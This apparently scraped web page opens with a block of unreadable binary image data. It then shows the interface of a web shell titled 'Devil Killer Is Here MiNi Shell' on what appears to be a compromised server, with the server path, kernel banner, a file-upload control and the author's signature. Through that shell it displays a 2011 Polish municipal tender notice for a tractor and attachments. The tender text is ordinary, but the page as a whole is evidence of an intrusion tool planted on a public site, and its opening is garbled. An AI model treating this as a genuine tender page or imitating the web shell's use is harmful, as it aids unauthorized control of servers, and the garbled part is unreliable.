JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110304/36396-N-2011.html

<p class="kh_header"><b>Nidzica: Dostawa ciągnika i osprzętu współpracującego z ciągnikiem</b><br>
<b>Numer ogłoszenia: 36396 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Oświaty i Sportu w Nidzicy , ul. Kolejowa 5, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 89 6252457, faks 89 6252457.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://nidzica-zoois.bip-wm.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ciągnika i osprzętu współpracującego z ciągnikiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa następujących urządzeń niezbędnych do wykonywania prac oraz zabiegów związanych  z utrzymaniem boisk sportowych o nawierzchniach z trawy naturalnej i sztucznej, terenów zielonych oraz placów zabaw: 

1.1 Zadanie  I Dostawa ciągnika
Kod CPV:
16700000-2 Ciągnik
 Przedmiot zamówienia w zadaniu I obejmuje dostawę ciągnika kompaktowego z kabiną, w pełni współpracującego z urządzeniami do pielęgnacji i utrzymania boisk o następujących wymaganych przez Zamawiającego parametrach i funkcjach: 
- masa max. 1000 kg
- silnik- diesel, min. 3- cylindrowy, chłodzony cieczą, min. moc silnika 30 KM 
- napęd: układ  4x4,
- prędkość od 0 do 30 km/h,
- skrzynia biegów hydrostatyczna,
- 2 wałki odbioru mocy (przedni min. 540 obrotów/min. i tylny min. 2000 obrotów/min.) do podłączenia urządzeń dodatkowych,
- przedni TUZ- podnośnik hydrauliczny z udźwigiem  min. 200 kg z 3- punktowym układem zawieszenia umożliwiającym podniesienie współpracujących z nim urządzeń,
- tylni TUZ- podnośnik hydrauliczny z udźwigiem min. 600 kg z 3- punktowym układem zawieszenia 
 umożliwiającym podniesienie współpracujących z nim urządzeń,
- hydrauliczne wspomaganie kierownicy,
-wydajność pompy hydraulicznej min. 12l/min.,
-wyjście hydrauliczne tył min. jedna para,
- wyjście hydrauliczne przód min. jedna para,
- ogumienie przystosowane do jazdy po sztucznej trawie lub uniwersalne,
- błotniki przednie i tylne,
- kabina montowana fabrycznie, wentylowana i ogrzewana,
- ciągnik musi być wyposażony w oświetlenie i przystosowany do poruszania po drogach publicznych.
Wyrób spełniający normy technologiczne, techniczne, jakościowe i użytkowe takie same lub wyższe i lepsze od produktu firmy Iseki, Kubot lub równoważny.

1.2. Zadanie  II Dostawa osprzętu współpracującego z ciągnikiem
Kod CPV:
34390000-7 Akcesoria do ciągnika
34223300-9 Przyczepy
43313100-1 Pługi odśnieżające lemieszowe

Przedmiot zamówienia w zadaniu II obejmuje dostawę osprzętu współpracującego z w/w ciągnikiem. Osprzęt powinien spełniać następujące wymagane przez Zamawiającego parametry i funkcje:
a)	 przyczepa: jednoosiowa, min. 2,0 t udźwigu, atestowany zaczep, oświetlenie drogowe, hamulec najazdowy i postojowy, koło podporowe, hydrauliczny podnośnik na trzy strony.
b)	lemiesz odśnieżający- szer.  1,6 m wraz z listwą gumową,
c)	dragmata (włoka)- 1,8 m. ze stali nierdzewnej co 25 mm (1) oczko, na konstrukcji ramy stalowej zaczepianej do ciągnika.

2. Zamawiający wymaga aby ciągnik i osprzęt do ciągnika były fabrycznie nowe, wolne od wad i kompletne. Wykonawca zobowiązuje się do przeszkolenia pracowników Zespołu Obsługi Oświaty i Sportu w zakresie obsługi urządzeń. 
3. W przypadku, gdy w opisie zamówienia, w jakiejkolwiek części dokumentacji lub innej części SIWZ, zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów, urządzeń, bądź przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych opisywanym, z zastrzeżeniem, że gwarantują one realizację zamówienia zgodnie z opisem przedmiotu zamówienia i zapewniają uzyskanie parametrów technicznych i funkcjonalno-użytkowych nie gorszych od założonych a także zgodne z wymogami określonymi w Polskich Normach przenoszących normy europejskie lub normach innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy. W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy, uwzględnia się w kolejności: 
-europejskie aprobaty techniczne,
-wspólne specyfikacje techniczne,
-normy międzynarodowe,
- inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa powyżej, uwzględnia się w kolejności :
-Polskie Normy,
-polskie aprobaty techniczne,
- polskie specyfikacje techniczne.
4. Sprzęt musi spełniać obowiązujące wymogi bezpieczeństwa i higieny pracy. Dostarczony sprzęt musi być wytworzony z zachowaniem polskich norm przenoszących normy europejskie i posiadać właściwości, cechy niezbędne do użytkowania i ich eksploatacji. Na żądanie Zamawiającego Wykonawca zobowiązuje się  przedłożyć na wskazane materiały certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z zasadniczymi wymaganiami dotyczącymi danego wyrobu.
5.Na dostarczony sprzęt, Wykonawca musi udzielić co najmniej 12 miesięcznej gwarancji.  Termin gwarancji będzie liczony od daty bezusterkowego odbioru dostawy.
5.1.W ramach gwarancji wykonawca musi zapewnić:
- bezpłatną obsługę serwisową na dostarczony sprzęt, 
- czas reakcji serwisu na zgłoszone usterki - nie dłużej niż 24 godzin.
Zamawiający wymaga od Wykonawcy dojazdu serwisu do zakupionych urządzeń. Serwis gwarancyjny realizowany będzie na zasadach określonych w książce serwisowej przy zachowaniu max. 24- godzinnego czasu reakcji na zgłoszenie awarii zakupionego ciągnika i urządzeń dodatkowych, a usunięcie usterek w ciągu 14 dni roboczych od zgłoszenia reklamacji. W przypadku braku możliwości usunięcia usterek w ciągu 14 dni, wykonawca zobowiązuje się dostarczyć sprzęt zastępczy do czasu usunięcia usterek. Wykonawca zapewnia serwis gwarancyjny i pogwarancyjny przez wyspecjalizowany personel oraz zapewnia odpłatną wymianę części zamiennych przez okres minimum 10-ciu lat od daty upływu gwarancji udzielonej na przedmiot umowy.
6. Wykonawca dostarczy gwarancje, instrukcje oraz wszystkie inne dokumenty dotyczące przedmiotu zamówienia sporządzone w języku polskim wraz z dostawą sprzętu.
7. Podstawą przekazania przedmiotu zamówienia będzie podpisanie przez strony protokołu zdawczo-odbiorczego.
8. Wykonawca dokona dostawy oraz rozładunku przedmiotu umowy pod adres ul. Polna 7, 13-100 Nidzica na własny koszt zapewniając należyte jego zabezpieczenie w czasie transportu oraz dbałość przy załadunku i rozładunku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 34.39.00.00-7, 34.22.33.00-9, 43.31.31.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie żąda wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia w/w warunek udziału w postępowaniu, jeżeli Wykonawca wykaże,  że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawę polegającą na: 
a) ubiegając się o 1 część  zamówienia-  dostawie  ciągnika lub urządzenia odpowiadającego rodzajem dostawie  stanowiącej przedmiot zamówienia w części I o wartości nie mniejszej niż 50.000 zł.,
b) ubiegając się o 2 część zamówienia- dostawie osprzętu współpracującego z ciągnikami lub innymi podobnymi urządzeniami o wartości nie mniejszej niż 10.000 zł.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić w granicach unormowania art. 144 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2010 Nr 113, poz. 759 ze zm.) za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany w niżej wymienionych okolicznościach. 
1.Zmiany przewidywane w umowie mogą być inicjowane przez zamawiającego lub przez wykonawcę. 
2.Zamawiający określa następujące warunki, w jakich przewiduje możliwość wprowadzenia zmian w umowie: 
1)zmianę terminu wykonania przedmiotu umowy w przypadku zaistnienia działań siły wyższej,
2) zmianę danych teleadresowych,
3) zmiany podwykonawców oraz zakresu podwykonawstwa w przypadku gdy Wykonawca wykonuje umowę przy pomocy podwykonawców. 
3.Korekta terminu zostanie przedłożona każdorazowo Zamawiającemu w terminie dwóch dni kalendarzowych po powzięciu wiadomości o konieczności wprowadzenia zmian w umowie w formie aneksu do umowy. Okres przesunięcia terminu zakończenia zamówienia będzie równy okresowi  koniecznemu na wykonanie dostawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nidzica-zoois.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Oświaty i Sportu 
13-100 Nidzica 
ul. Kolejowa 5
woj. Warmińsko- Mazurskie
tel., fax  089*625 24 57 
e-mail: zoois@nidzica.pl
strona: http://nidzica-zoois.bip-wm.pl/public/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 09:30, miejsce: Zespół Obsługi Oświaty i Sportu 
13-100 Nidzica 
ul. Kolejowa 5
woj. Warmińsko- Mazurskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa ciągnika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zadaniu I obejmuje dostawę ciągnika kompaktowego z kabiną, w pełni współpracującego z urządzeniami do pielęgnacji i utrzymania boisk o następujących wymaganych przez Zamawiającego parametrach i funkcjach: 
- masa max. 1000 kg
- silnik- diesel, min. 3- cylindrowy, chłodzony cieczą, min. moc silnika 30 KM 
- napęd: układ  4x4,
- prędkość od 0 do 30 km/h,
- skrzynia biegów hydrostatyczna,
- 2 wałki odbioru mocy (przedni min. 540 obrotów/min. i tylny min. 2000 obrotów/min.) do podłączenia urządzeń dodatkowych,
- przedni TUZ- podnośnik hydrauliczny z udźwigiem  min. 200 kg z 3- punktowym układem zawieszenia umożliwiającym podniesienie współpracujących z nim urządzeń,
- tylni TUZ- podnośnik hydrauliczny z udźwigiem min. 600 kg z 3- punktowym układem zawieszenia 
 umożliwiającym podniesienie współpracujących z nim urządzeń,
- hydrauliczne wspomaganie kierownicy,
-wydajność pompy hydraulicznej min. 12l/min.,
-wyjście hydrauliczne tył min. jedna para,
- wyjście hydrauliczne przód min. jedna para,
- ogumienie przystosowane do jazdy po sztucznej trawie lub uniwersalne,
- błotniki przednie i tylne,
- kabina montowana fabrycznie, wentylowana i ogrzewana,
- ciągnik musi być wyposażony w oświetlenie i przystosowany do poruszania po drogach publicznych.
Wyrób spełniający normy technologiczne, techniczne, jakościowe i użytkowe takie same lub wyższe i lepsze od produktu firmy Iseki, Kubot lub równoważny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa osprzętu współpracującego z ciągnikiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zadaniu II obejmuje dostawę osprzętu współpracującego z w/w ciągnikiem. Osprzęt powinien spełniać następujące wymagane przez Zamawiającego parametry i funkcje:
a)	 przyczepa: jednoosiowa, min. 2,0 t udźwigu, atestowany zaczep, oświetlenie drogowe, hamulec najazdowy i postojowy, koło podporowe, hydrauliczny podnośnik na trzy strony.
b)	lemiesz odśnieżający- szer.  1,6 m wraz z listwą gumową,
c)	dragmata (włoka)- 1,8 m. ze stali nierdzewnej co 25 mm (1) oczko, na konstrukcji ramy stalowej zaczepianej do ciągnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.39.00.00-7, 34.22.33.00-9, 43.31.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com